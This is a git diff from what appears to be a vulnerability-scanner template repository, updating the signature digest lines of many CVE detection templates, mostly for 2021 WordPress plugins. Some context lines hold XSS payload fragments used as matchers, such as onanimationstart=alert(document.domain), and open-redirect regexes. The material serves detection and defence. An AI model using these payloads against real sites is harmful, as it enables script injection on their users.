digest: 4a0a004730450220204302541a5adc4eb84fc50fb71121e7140fda5e325560f2bc6af782c3aca218022100ab9e70ee88a95d91743d26f6f03d095cacd2446df954554ebd5977cd1815c210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b653f536091e0603e57af8a247f5ce9ccc9a68ab71dc37adc2803c35340e3cd902206f6510618f90482cfba44e12b47d8a6e08a7a9223dac740fd1d2186345e92be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index c1fb04e22b..b642376aba 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "User credentials are invalid.")' condition: and -# digest: 4b0a00483046022100fce3161626802d300b9a7d01b3d0b39df2f76c16556c4cd0f1f0f331408796bf022100f4a95c3a1fee3e3a75c2105e41b3554e20ce5802440a244a4f7cab3280f3178f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb5b4e734fba05c09c1c094c94b84b400b14dcba5ef57448829d5b5d3016005a022100d239aadd95068d42bf67a4af289a4912b7ae0c574f6d7a721d993912ffcfd81c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 59d52e2340..97917ec25a 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -62,4 +62,4 @@ http: - '"slug":"([_a-z-A-Z0-9]+)",' internal: true part: body -# digest: 4a0a0047304502200993a9a2953aa772460c25d771fb5bc7793c9f97df213694a924f140c82564c2022100ee73b7aa4e200224d68aa207881162ef141bd75466b4b8a9c7973eb4706c3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075953a948bbf07dfe438a4053199d14ef8837ea7498130e197c58060bf0f8a320220385d5b4121d992c9c2ae5d7c7e7e4b0176c57ec274c25d34e1083a6f2b7f910e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 1ebbaa838e..4ccbb382f4 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd8e2f1ed7e6ac787ddc76d145588e55c3e1af2729f0eb0f6652d1c52284da91022100d61e0a905aa5921060a0e2bc63fdba2790e30fdd1d29ed5d3763b2e491f9dda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066f963610956751aad95f5b686b34695f912af8f37326c25b6fec6f8db31d602022100d6ba059cd38cb02845d4f79da8521497306aca3671c3231f9b17d54f08b1c05f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 3b46901aee..de80448708 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100b49cb02f5e7f2e64f2ca2e050d6d61f31f4b28f27b4d952e4c4f44d672f31fc0022100ca970f8df5900aaa1bb963b0f20c63b05d6bb52089ee35b266d0c44cc1a9ed46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071227d1361f32f5ff9354a3887ff0536eb287e035f3bee849fbd26799874a89b022100eacf4cb81d3e76c4084196efdece913cdc78100ad1664aef9d5f9b3b5ce486cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index eacd0704ad..0909a4c438 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -68,4 +68,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4b0a00483046022100bbf59a47f71316406d2c275ffe083887a61ca90c2bb565a172cfafec81e8831d022100dd9addbecef7f4747f2d8f4e5e885ce12bf696e155604e3202698bc84fc89420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adaf3f6dbade14a8363e77bf12c0cea329147bc2403931be1388051547c74e0f022100a0df347fa16ec48be9b13ad6a97de3bfb8d0d15be7b11f4797ef9cd4278c394a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index a25744d26b..f9bb6eb8ce 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -54,4 +54,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "rm_user_role_mananger_form")' condition: and -# digest: 4a0a00473045022100e291dd94c5d8a5cf0d02cbfdd5212108c69acd79b92db5c04881b59af89449040220781cf0b9c9e4ff06f64c490aaecc845f875e184b75df4413f58b712af3304d65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e094ec14b2add716b2cc645857d709bbe7216d825cb1b18ce5b7733457860e2c02206859da8890901f7219e49f41586f721cfc4c7b1adfb4768948e8eaf03da4ba26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index f6b3138b75..67a28376a0 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "eCommerce Product Catalog")' condition: and -# digest: 4a0a0047304502210090b957beb8440eaf4acf667c971c051694c39e18b33a8a8b31ae16d36d5f56fa0220598145a711dd9feeef1155fb5654ff6abd36cc88b7decadc8e3ea432ed896fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068762d10731467e795bbe4b8e7b1db7d3be629d6dd145293b02dd9d2ca4f9ffc022079c5abdb01810ddcd4154c5dd96662406962e2b5602f03c7ae765874d4618216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index e17238227a..5fa848cbeb 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -70,4 +70,4 @@ http: - type: kval kval: - version -# digest: 490a0046304402205b282380b349f854fb682c0a9e29f9260987ccc282a94ff7317206ba7e3d03db022055093df9a46c6e757eac59c584cb657f373924eae480a7af9c82cf24c168f3a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ea3f3423d4068dd6ed2c0c60b4b97e5add71418527dc2067a8afeacfba7936502207434fc75eab6c206bf2e9194b2c4891776e633f7d22f0cdb4ed36ffabbf0a748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index c7b59060d0..eca520dafd 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021e03802b55f2eb84ef9a04bcd3faf25c0e6e1aa7b5f5f1219b885c12debbaff0221009f117cd73568a12faad8e3a4e9a6e0bdb4d0ce5ef3413b62bb2a0f10db515323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index f08202d415..d349a0b170 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -52,4 +52,4 @@ http: - type: kval kval: - location -# digest: 4b0a00483046022100aa02258a3fe31969b26abef88381abc8502bee1888b8beaa33762c32b70968cf0221008b4c288173be99e17f8cbfc8dec7f1a886966396d1bc254fb80b1ba526800975:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c84c2cd344bcaff4decfba4969af0b615c69b0924f2e8a4c60567b9d62619cb7022100a31f6dfcf3ed63ba7e0837b07f2afdc9a82aef82b837cf35e065afa4ada3aae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index 2acffb37c4..e246bf0773 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c783a4a970c0662a6dd16eae529fb34417646bea28de131de71763a1ef39c0cc02206563dd169b556b99536a82b4faf54ccaf8c788f01fef9f319da3d4b37983af0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 7f6c46512c..baed0b093b 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -50,4 +50,4 @@ http: - contains(body_2, 'accesskey=X onclick=alert(1) test=') - contains(body_2, 'woocommerce_persian_translate') condition: and -# digest: 4b0a00483046022100b7047b7f826c9feeea2a1e804ec10dee788c3f73bf6a15b7f203b50f4b63af08022100b8021e9cb1d934188fbe23f2ce21be31736eec16f8f4d29453819a12fab97e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100826d482d8b237a1f2fa54478c880d7f1f60bf8ffef2b1fc3a2ef61d1d125bcd3022077b886b61bb9b4e8c9f7af2e0ca8a2c49a6fb5758529c7ffaeeb52ff257fc556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index a81863dedf..064d8e7665 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "Please enter the email you registered with")' condition: and -# digest: 4b0a00483046022100b80877af0947d3a8a37e4c34281cf76f8f00154d90974a6dd87bf80d91980837022100eabb89ae18f62fe2508c9fdc28dc7316c524d8dc3a6d1cd28f28d8cc14f0b9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015bcdf20ae52f30c13798d586e5d521ea0573919ad1d39d94d38ea91d834e80f02210092253fe3526a65605c2e2b2b4ff6d134a3007c85663f8e9536ed0a719e91915e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index f284ecda8b..ebcb0c2ff1 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and -# digest: 4a0a004730450220639f36ec2923e5c1fa51bab912bd571fed2585b6cbe587796844a913eb606c6e022100d5fa2051f016ff2940ca7e37b26ed07563aa7272b2bc5f69a8a4b96dd0f549d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005a0ed6fd4a954f355471debb3135a50f8aa1fc8f46d755cdf7ec6fbad2ebb11022005f3d8ac225181d1a9a4a8514d1810eb4fee21dc685447ccceea3418b5f6a24c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index d7e1e07bba..996c90930d 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2e26ade062de1ff1843bcde320f8d5fd95a7bfbbf93876a2c70bb68c00923df022055f0e5e8372c41a0b0115cfc2f7ec8171f565c60e86604524cfce3d01ab71fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 47631179bd..b477e9622c 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Hello world!")' - 'contains(body_2, "Welcome to WordPress")' condition: and -# digest: 4a0a00473045022100b5d1766bc6648351452ccabff49a901fdcee3d82c63473eb3f7da8360ad1a0f802201b2b426c71f82735e56341c6b3a49558a74a3e6d0a936e46a2d1c375a0d2dffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7b02070d6d419419410aed00e357f3dcfcc93de4f12ce37757d4e21f98ae656022009bb078daf9337fb3b1ba82048e249ea3ffab290def9ad03d42a92ed04a6d43c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 462f0b3242..d2de46388d 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' condition: and -# digest: 4a0a0047304502204c311ac0221f929a6e40782a29c695f3b9f8f53fdb8540c1a50f006d72c4665f022100bfbd6264919d48a0a9046f8c4b2fc16c812b6b9713d44a254f19dd0c43a97101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6856e294174b5d9dc89185a9c240281456650c3f4eeb59816c9a51b1ca9517302203a40995842fd40ce5b2cc4200bb0f904d6f6f581d80c0a5616f0f17ab83251be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 83d6467a16..c55cbe0b1a 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -58,4 +58,4 @@ http: - contains(body_3, md5(num)) - contains(body_3, 'PNG') condition: and -# digest: 4a0a00473045022100b5707ad91e6b1dfa5b4a3bc474d4742991a1d184ae0613aa6cb97d286b6dfc10022037152a98a4212c570ce5b27a05074e2caeefd10b0e48b23218d1d6956512453e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e6a744ebfaa614eed30ef3cd33a2ac5c7089be9bbd038ba7defa214e4e5ceea022038599e3aab4aa30059c0ef392fbd7bc905b3871cd35ce7030933fb56e72540d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 352c776b7b..a352ecd5eb 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210080481e6e1ba1c67c11351890a405747b0082be4ba5d44bf5837a927a64705902022023a138df22ac6f0201daaf4656cb1c2ce449367c4251627cbf62327376b74bc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082b5a190481ec70760a35aecf1b3d8e80483f8b4839e56f54a619e4b7b4e26630220560834cc1d0dc002ef01ad44f8ebae701b1820461e6fd3ab0287f317defec8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index e92757d723..075bcfb9cd 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200562d68182e1f0832f719f7ffcc7031dd943c79e8086641c3bf82c70789eb8f30220539f7c805bba5467372c8534f30dd6565b0ad9886177350366dca637604e7708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5acc9465e15b102954f10f7359ee1bc2f84794775d4ede6b9a7068b41f88775022100a6c201acb8e3d859ec1fd6dbf27d7df311de39ca11129dabdfef9954a4fc6f30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index 2908de28bf..4d393cc0b8 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022012084f97047c7ac54d9935c917e356d3e8cc4cf7d1eb64fe16de01ea652b7ca9022100e2abc8461b032fe559fe1bd613aada42533b08c6dc4a843581c08b25e83f2b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220396b879300ee930d2f38493e39073877ff41c4af5abc29c947fa5c14aec64ddd022003e133cc244800f7b286f496f65b5c72e57ea4ca88262b2dd450462dc9551af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index ac1d045abd..e13bc1c6c8 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205262ea4dab221e3963ad7f92b32d9b9dad85dfa63eb43144b4d17fb5dfd2371a0220423122b10f03da727e631455d4cd3c7d6adc8f94bd6bf9e89525bf11bdfa97b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220595e42e9d556d5b860ac2a9bc3207e17f4dc91badec2e2d2b3374b4ff73d4e61022064b3a6f861c7a64d293768a29f0be6f3e0f31b62c158193acd688e52edc00042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index fdaad78ff7..4d0c89b56d 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220638af89697796455e81da94a0b565bf04d1772c49363f630e14a8c366cf52334022100d961ae7ead36d711dd2c4b09d124180e8f7e9b14143961e41b8f770f612ec21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7eccba5a861cce486e72884ee3824b74364f868014025a45a4131bc402454c802204b257174d1b932eb3e65f3d2ae1cbdc951be80a7da27b9dd8529014b43d18315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 95412664b1..6147e1b998 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "custom-facebook-feed")' condition: and -# digest: 490a00463044022066171bc49b581bbbebf6e9bec3caae6f91de6cce6ace3ec1704214aab994b6000220419bff836a9ea9a7f671fe1105bc2f9f544d5b7cf562d3934255061ebaeb8388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa83a00697d269b6cdd964481b903dd4b5069d5728458b99b869b47d6ee1e7ba0220698974fb740ad266961d030e116bfe683009ce16c756a3e4cd82db8ede877d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 0aa6bc1c92..e4ada99808 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")' - 'contains(body_2, "Enter Page Title")' condition: and -# digest: 4a0a00473045022100c83a8800b7738a60c2e6679d08ac8364a83b01e70927c405a8c6a5ab61c297a0022063a98761a2006bab30e128e42f3f9407f213005d4b390a7faf7027e103f4cf29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b820f7d0c8b503290615d361e0a08d402226a096da56aae2ade760918f99fa20221009878e7766f0e0d4ee7a84cb1333925eb17d7d2e639e9644029600f8589a2f900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 5cbce79e79..2bf8ca19f5 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c669b18178ca28119ca6a8bfc6992e205f34d74494ea204e90aafd87ca6506710221009983c4a067b30c7584b1b513ed5c3e345e4900e97b7e9bc61e0e54a2b0072bbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077f210250f3482bba71ed34537c591cdac0a7d3c0ac9e2d84956ae5c8df4d5430220071507b63b43298b7af76742ac5962469b6912baa0b527ac7794bd18a2ebf931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index ae07f65a34..8a40eff141 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_3, "")' - 'contains(body_3, "Affiliates Manager Click Tracking")' condition: and -# digest: 4a0a00473045022100d45c069f29a544929998b412cdaf7084396f20aae8cff0f93ca75a1b591460d202201e599ffe4698dda85884b6e16ba5a83ac94b79c1a3ef46490718bf36107cfa50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205420c61f4ee475a86db3c599da678c923ba014fa64627236d5f17ffd13df56560220707745d963b3cbb472024e4a4378e9b1558221e88182717ff860524bf1d80101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index f116995a9c..2bb357073a 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -48,4 +48,4 @@ http: - 'contains(header_2, "text/html")' - "contains(body_2, '') && contains(body_2, 'contact-form')" condition: and -# digest: 490a004630440220527cd48e142fc92a896aa9a399aaec530758544a07344bf510df911351b0108c022051f1ca942de9836a377cb44c7a038c6f2b740ecceeb66faca7d10b4a7e7f7585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081018c04073a87e5b7f9d30d4cd03bfeda2b5aeaa62d6f3540b647c8942cf9c502210092c6e5b86f8c67e1d553ac133d0e8558ad59910e9663e93c4ab77d701e538f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index eba5ae5a8a..0f1571ed7a 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9908167df17fe760df5f1a19699d139a5efbb37c3dedd65ffedf9f786c4860002210085485a2e0ded0fe926fbaeb985991879d0ca1ff02fb398695df4569d41ac1248:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b3cc62097692b48f30dee9a31e29edd84cc6b0210ebef1e269f2f80c2f58ac302204e482d374b7af734d30314feb1693a063427895d8f854955b9dfd687e6d3fc91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 437a7437e3..ed93a27ca2 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -49,4 +49,4 @@ http: - 'contains(body, "")' - 'contains(body, "give_user_login")' condition: and -# digest: 4a0a00473045022100b8b1bbb738779094f1c4803577aabec032f44d2bd14d740c5bc4dc129660ed1c0220446b58a14acbdfe6216958668bbfe39c82d48cc2aa45a2dd0645799000150e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c98a60fdfc37512556f1094274d13b080633a1ca2b55936ebc78706b94e40f1802210097f53cc5b2062010ca5f95dc8e2ba351657f0a380ae226bbe6a89baf8d814659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index 4fe58eeb3a..bcc6264ac6 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c708c9870bc63c69a3f1def25dd27763eaba8128f6e43e0cf88fabc70b5fa5b6022047d48c94f0cc428629cc691003da6be6396610f38fb5143d2b25aeea33bf3452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index cf4851f126..82dd73ca3c 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -54,4 +54,4 @@ http: - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and -# digest: 490a0046304402205779f4688b602f810729763c28227697e17fbe54eabdf2769e00c3efd62634dc0220099aece2ea83884ee11dd109d206c253835129f29b3ea2922f55c13bbcce1686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207de8e73991a2a2ea9f767132a911b28acd5f15f81350811d38a3eed802250e5202202138d48fcec072875db3d63ae94f864885f6b7fe49ca722e648872f42973317a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index fa4359d96f..af3c673ea6 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3ce163f0a4245b48fadd091ce77fffda6474552e66006405db188add5f1336702210088a04491ecf1ec03bde9a145ed885d03c432c745e0df7266f322e4320502f4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a44c6b99d96752d6d1044219147a287fa483081b4cefde0d0324789ebfdef48002206c44b9b64366d8b7190dc5833adac66733a502824d3172942146a5897d6afe95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 12959a1a31..cb1497a1bf 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022026b9eff4faf7599079f837764767028f6e5520d8f44a5be3b3dda8d7685666760221008230a47ce5142560d40267697a5445d19124ff79ed4623f4fcd9c119b4591483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100832505461e275bee296eefef6ebff2291fa8b9b696b9d14bc16babda7e02dda6022100cfdeaa90b36ac7a7db430d5e6ce75fcdc61cbaefb511b9bd0b44bffc2cbda241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index c22b08f84c..8a0c984469 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -87,4 +87,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 